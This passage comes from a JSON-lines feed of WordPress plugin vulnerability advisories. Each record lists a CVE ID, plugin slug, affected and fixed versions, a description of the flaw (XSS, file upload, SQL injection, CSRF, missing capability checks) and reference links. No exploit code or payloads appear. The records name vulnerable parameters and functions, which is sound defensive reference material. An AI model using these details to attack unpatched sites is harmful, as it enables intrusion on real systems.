version","refs":"[{\"url\":\"https:\\\/\\\/docs.potenzaglobalsolutions.com\\\/docs\\\/ciyashop-wp\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/docs.potenzaglobalsolutions.com\\\/docs\\\/ciyashop-wp\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca41c951-318f-47a7-9a30-c1d4eea1b1b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca41c951-318f-47a7-9a30-c1d4eea1b1b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11359","slug":"library-bookshelves","versionImpact":"5.8","versionEndExcluding":"5.9","description":"The Library Bookshelves plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-bookshelves\\\/tags\\\/5.8\\\/class-bookshelves-settings.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-bookshelves\\\/tags\\\/5.8\\\/class-bookshelves-settings.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204540%40library-bookshelves&new=3204540%40library-bookshelves&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204540%40library-bookshelves&new=3204540%40library-bookshelves&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/253dcecb-b88d-423c-8e74-1d59581e2893?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/253dcecb-b88d-423c-8e74-1d59581e2893?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5720","slug":"customer-reviews-woocommerce","versionImpact":"5.80.2","versionEndExcluding":"5.81.0","description":"The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018author\u2019 parameter in all versions up to, and including, 5.80.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.81.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/tags\\\/5.78.1\\\/includes\\\/reviews\\\/class-cr-reviews-list-table.php#L1033\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/tags\\\/5.78.1\\\/includes\\\/reviews\\\/class-cr-reviews-list-table.php#L1033\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/tags\\\/5.78.1\\\/includes\\\/reviews\\\/class-cr-reviews-list-table.php#L1052\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/tags\\\/5.78.1\\\/includes\\\/reviews\\\/class-cr-reviews-list-table.php#L1052\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/tags\\\/5.78.1\\\/includes\\\/reviews\\\/class-cr-reviews-list-table.php#L1073\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/tags\\\/5.78.1\\\/includes\\\/reviews\\\/class-cr-reviews-list-table.php#L1073\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6126ec74-d522-45ff-aa03-07aad5fb75b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6126ec74-d522-45ff-aa03-07aad5fb75b9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8113","slug":"ebook-store","versionImpact":"5.8014","versionEndExcluding":"5.8015","description":"The Ebook Store WordPress plugin before 5.8015 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers.","recommendation":"Update to version 5.8015, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/752908b4-7d05-476f-8920-1d0e58fc2983\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/752908b4-7d05-476f-8920-1d0e58fc2983\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7486","slug":"ebook-store","versionImpact":"5.8012","versionEndExcluding":"5.8013","description":"The Ebook Store plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Order Details in all versions up to, and including, 5.8012 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 5.8013, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/functions.php#L230\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/functions.php#L230\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328355\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328355\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20e0e651-8330-4062-8fb4-f0545befcb1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20e0e651-8330-4062-8fb4-f0545befcb1a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7437","slug":"ebook-store","versionImpact":"5.8012","versionEndExcluding":"5.8013","description":"The Ebook Store plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ebook_store_save_form function in all versions up to, and including, 5.8012. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.8013, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/functions.php#L2442\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/functions.php#L2442\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328355\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328355\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dc5c05d-51b7-4aee-bb4e-366ded45c4d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dc5c05d-51b7-4aee-bb4e-366ded45c4d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11287","slug":"ebook-store","versionImpact":"5.8001","versionEndExcluding":"5.8002","description":"The Ebook Store plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.8001. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.8002, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/functions.php#L827\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/functions.php#L827\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/001289a3-a1a9-441f-b399-e9b699094e1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/001289a3-a1a9-441f-b399-e9b699094e1a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5453","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.8.6","versionEndExcluding":"5.8.7","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pm_dismissible_notice and pm_wizard_update_group_icon functions in all versions up to, and including, 5.8.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary options to the value '1' or change group icons.","recommendation":"Update to version 5.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a44d182-2a43-47c0-ab2e-36c0514c1d47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a44d182-2a43-47c0-ab2e-36c0514c1d47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L2006\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L2006\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L1378\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L1378\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095503\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095503\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6449","slug":"contact-form-7","versionImpact":"5.8.3","versionEndExcluding":"5.8.4","description":"The Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'validate' function and insufficient blocklisting on the 'wpcf7_antiscript_file_name' function in versions up to, and including, 5.8.3. This makes it possible for authenticated attackers with editor-level capabilities or above to upload arbitrary files on the affected site's server, but due to the htaccess configuration, remote code cannot be executed in most cases. By default, the file will be deleted from the server immediately. However, in some cases, other plugins may make it possible for the file to live on the server longer. This can make remote code execution possible when combined with another vulnerability, such as local file inclusion.","recommendation":"Update to version 5.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d7fb020-6acb-445e-a46b-bdb5aaf8f2b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d7fb020-6acb-445e-a46b-bdb5aaf8f2b6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7\\\/tags\\\/5.8.3\\\/includes\\\/formatting.php#L275\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7\\\/tags\\\/5.8.3\\\/includes\\\/formatting.php#L275\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/rocklobster-in\\\/contact-form-7\\\/compare\\\/v5.8.3...v5.8.4\",\"name\":\"https:\\\/\\\/github.com\\\/rocklobster-in\\\/contact-form-7\\\/compare\\\/v5.8.3...v5.8.4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/contactform7.com\\\/2023\\\/11\\\/30\\\/contact-form-7-584\\\/\",\"name\":\"https:\\\/\\\/contactform7.com\\\/2023\\\/11\\\/30\\\/contact-form-7-584\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3003556\\\/contact-form-7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3003556\\\/contact-form-7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3606","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.8.3","versionEndExcluding":"5.8.4","description":"The ProfileGrid \u2013 User Profiles, Memberships, Groups and Communities plugin for WordPress is vulnerable to unauthorized deletion of data due to a missing capability check on the pm_upload_cover_image function in all versions up to, and including, 5.8.3. This makes it possible for authenticated attackers, with subscriber access or higher, to delete attachments.","recommendation":"Update to version 5.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c039d2fe-7518-4724-a025-6380a53fb58c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c039d2fe-7518-4724-a025-6380a53fb58c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069928\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk?contextall=1&old=3068943&old_path=%2Fprofilegrid-user-profiles-groups-and-communities%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069928\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk?contextall=1&old=3068943&old_path=%2Fprofilegrid-user-profiles-groups-and-communities%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5140","slug":"bonus-for-woo","versionImpact":"5.8.2","versionEndExcluding":"5.8.3","description":"The Bonus for Woo WordPress plugin before 5.8.3 does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 5.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ee1824e8-09a6-4763-b65e-03701dc3e171\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ee1824e8-09a6-4763-b65e-03701dc3e171\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5612","slug":"essential-addons-elementor","versionImpact":"5.8.15","versionEndExcluding":"5.8.16","description":"The Essential Addons for Elementor Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018eael_lightbox_open_btn_icon\u2019 parameter within the Lightbox & Modal widget in all versions up to, and including, 5.8.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.8.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8dbe4104-b7d1-484f-a843-a3d1fc02999d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8dbe4104-b7d1-484f-a843-a3d1fc02999d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/essential-addons.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/essential-addons.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5086","slug":"essential-addons-elementor","versionImpact":"5.8.14","versionEndExcluding":"5.8.15","description":"The Essential Addons for Elementor PRO \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Team Member Carousel widget in all Pro versions up to, and including, 5.8.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.8.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7773b98-537f-4f4e-98d6-db61d2bffe8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7773b98-537f-4f4e-98d6-db61d2bffe8c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/essential-addons.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/essential-addons.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7850","slug":"bp-profile-search","versionImpact":"5.7.5","versionEndExcluding":"5.8","description":"The BP Profile Search plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.7.5. This is due to missing or incorrect nonce validation on the bps_ajax_field_selector(), bps_ajax_template_options(), and bps_ajax_field_row() functions. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1acfa5d1-c1ba-4ba5-9511-0f4adbe5b9ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1acfa5d1-c1ba-4ba5-9511-0f4adbe5b9ca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-profile-search\\\/trunk\\\/bps-admin.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-profile-search\\\/trunk\\\/bps-admin.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136686\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136686\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137271\\\/bp-profile-search\\\/tags\\\/5.8\\\/bps-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137271\\\/bp-profile-search\\\/tags\\\/5.8\\\/bps-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12712","slug":"wp-easycart","versionImpact":"5.7.8","versionEndExcluding":"5.7.9","description":"The Shopping Cart & eCommerce Store plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the webhook function in all versions up to, and including, 5.7.8. This makes it possible for unauthenticated attackers to modify order statuses.","recommendation":"Update to version 5.7.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211285\\\/wp-easycart\\\/trunk\\\/wpeasycart.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211285\\\/wp-easycart\\\/trunk\\\/wpeasycart.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28a3f382-3801-4e98-9004-56c27a85f0a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28a3f382-3801-4e98-9004-56c27a85f0a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11924","slug":"email-subscribers","versionImpact":"5.7.51","versionEndExcluding":"5.7.52","description":"The Icegram Express formerly known as Email Subscribers  WordPress plugin before 5.7.52 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.7.52, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/70288369-132d-4211-bca0-0411736df747\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/70288369-132d-4211-bca0-0411736df747\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0671","slug":"email-subscribers","versionImpact":"5.7.49","versionEndExcluding":"5.7.50","description":"The Icegram Express  WordPress plugin before 5.7.50 does not sanitise and escape some of its Template settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.7.50, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4e04f01-31cb-4f5e-9739-12f803600e60\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4e04f01-31cb-4f5e-9739-12f803600e60\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12568","slug":"email-subscribers","versionImpact":"5.7.44","versionEndExcluding":"5.7.45","description":"The Email Subscribers by Icegram Express  WordPress plugin before 5.7.45 does not sanitise and escape some of its Workflow settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.7.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ce9075a-754b-474e-9620-17da8ee29b56\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ce9075a-754b-474e-9620-17da8ee29b56\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12567","slug":"email-subscribers","versionImpact":"5.7.44","versionEndExcluding":"5.7.45","description":"The Email Subscribers by Icegram Express  WordPress plugin before 5.7.45 does not sanitise and escape some of its form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.7.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82051ccc-c528-4ff3-900a-3b8e8ad34145\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82051ccc-c528-4ff3-900a-3b8e8ad34145\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12566","slug":"email-subscribers","versionImpact":"5.7.44","versionEndExcluding":"5.7.45","description":"The Email Subscribers by Icegram Express  WordPress plugin before 5.7.45 does not sanitise and escape some of form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.7.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9206064a-d54e-44ad-9670-65520ee166a6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9206064a-d54e-44ad-9670-65520ee166a6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11636","slug":"email-subscribers","versionImpact":"5.7.44","versionEndExcluding":"5.7.45","description":"The Email Subscribers by Icegram Express  WordPress plugin before 5.7.45 does not sanitise and escape some of its Text Block options, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.7.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da616c20-3d74-4d3a-95f5-2d71d9ada094\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da616c20-3d74-4d3a-95f5-2d71d9ada094\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12311","slug":"email-subscribers","versionImpact":"5.7.43","versionEndExcluding":"5.7.44","description":"The Email Subscribers by Icegram Express  WordPress plugin before 5.7.44 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 5.7.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e00ba37-da7f-4703-a0b9-65237696fbdd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e00ba37-da7f-4703-a0b9-65237696fbdd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8771","slug":"email-subscribers","versionImpact":"5.7.34","versionEndExcluding":"5.7.35","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'preview_email_template_design' function in all versions up to, and including, 5.7.34. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including the content of private, password protected, pending, and draft posts and pages.","recommendation":"Update to version 5.7.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9d90717-fd48-493b-9293-32976bf2cada?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9d90717-fd48-493b-9293-32976bf2cada?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-email-subscribers-admin.php#L1754\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-email-subscribers-admin.php#L1754\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157336\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157336\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8254","slug":"email-subscribers","versionImpact":"5.7.34","versionEndExcluding":"5.7.35","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.7.34. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 5.7.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d4ae4a7-aec1-4cc1-bea0-61dde44027fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d4ae4a7-aec1-4cc1-bea0-61dde44027fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/tags\\\/5.7.29\\\/lite\\\/includes\\\/class-es-common.php#L244\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/tags\\\/5.7.29\\\/lite\\\/includes\\\/class-es-common.php#L244\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157336\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157336\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1554","slug":"quick-paypal-payments","versionEndExcluding":"5.7.26.4","description":"The Quick Paypal Payments WordPress plugin before 5.7.26.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d247a3d-154e-4da7-a147-c1c7e1b5e87e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d247a3d-154e-4da7-a147-c1c7e1b5e87e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
